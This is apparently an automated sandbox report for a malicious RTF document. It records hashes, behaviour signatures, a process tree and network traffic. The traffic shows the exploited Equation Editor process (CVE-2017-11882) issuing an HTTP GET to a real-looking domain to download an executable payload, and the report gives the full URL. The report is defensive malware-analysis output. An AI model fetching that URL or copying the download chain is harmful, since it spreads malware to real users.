Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
121s -
max time network
129s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
-
submitted
20/11/2024, 18:18 UTC
General
-
Target
967059c927f066a79905cf5a2f99562ca72409238322098e8ac93c905e75a1af.rtf
-
Size
4KB
-
MD5
2d6060a66195cf2a68d79606b5eae8f8
-
SHA1
426a17bf4ec7f5eb61ca038032fdea22ec401379
-
SHA256
967059c927f066a79905cf5a2f99562ca72409238322098e8ac93c905e75a1af
-
SHA512
55f0c46bd8fa99604238b06e5bd8737574d69f12b6e52adc3b253805952616f3e7da0a7aa179c1a8bd1d3b07fcab1a49ddd4bbd057c34ca8fb957c78b8269754
-
SSDEEP
96:QLl3HYpkWq2Ngv+yp5UglURVkFvHADrseco7VLo6EEGrvJAt5PbANI:iloisN6p59loSFCsA7VREEGrRQ5PbAu
Score
8/10
Malware Config
Signatures
-
Blocklisted process makes network request 5 IoCs
-
Drops file in Windows directory 1 IoCs
-
System Location Discovery: System Language Discovery 1 TTPs 2 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
-
Office loads VBA resources, possible macro or embedded object present
-
Launches Equation Editor 1 TTPs 1 IoCs
Equation Editor is an old Office component often targeted by exploits such as CVE-2017-11882.
-
Suspicious behavior: AddClipboardFormatListener 1 IoCs
-
Suspicious use of SetWindowsHookEx 2 IoCs
-
Suspicious use of WriteProcessMemory 4 IoCs
Processes
-
C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\967059c927f066a79905cf5a2f99562ca72409238322098e8ac93c905e75a1af.rtf"1⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\splwow64.exeC:\Windows\splwow64.exe 122882⤵
-
-
C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE"C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding1⤵
- Blocklisted process makes network request
- System Location Discovery: System Language Discovery
- Launches Equation Editor
Network
-
DNShartac.co.zaRemote address:8.8.8.8:53Requesthartac.co.zaIN AResponsehartac.co.zaIN A154.0.162.16 -
GEThttp://hartac.co.za/wp-content/plugins/dac83144a70c491c9bb53bbf00eb4cc1/xt/mmd/cf4ubbOUYe0jqmac.exeRemote address:154.0.162.16:80RequestGET /wp-content/plugins/dac83144a70c491c9bb53bbf00eb4cc1/xt/mmd/cf4ubbOUYe0jqmac.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
Host: hartac.co.za
Connection: Keep-Alive
ResponseHTTP/1.1 301 Moved Permanently
Date: Wed, 20 Nov 2024 18:18:15 GMT
Server: Apache
Location: https://hartac.co.za/wp-content/plugins/dac83144a70c491c9bb53bbf00eb4cc1/xt/mmd/cf4ubbOUYe0jqmac.exe
Content-Length: 308
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
-
154.0.162.16:80http://hartac.co.za/wp-content/plugins/dac83144a70c491c9bb53bbf00eb4cc1/xt/mmd/cf4ubbOUYe0jqmac.exehttp
HTTP Request
GET http://hartac.co.za/wp-content/plugins/dac83144a70c491c9bb53bbf00eb4cc1/xt/mmd/cf4ubbOUYe0jqmac.exeHTTP Response
301 -
154.0.162.16:443hartac.co.zatls
-
154.0.162.16:443hartac.co.zatls
-
154.0.162.16:443hartac.co.zatls
-
154.0.162.16:443hartac.co.za
-
8.8.8.8:53hartac.co.zadns
DNS Request
hartac.co.za
DNS Response
154.0.162.16
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
4KB
-
Filesize
64KB
-
Filesize
44KB
-
Filesize
44KB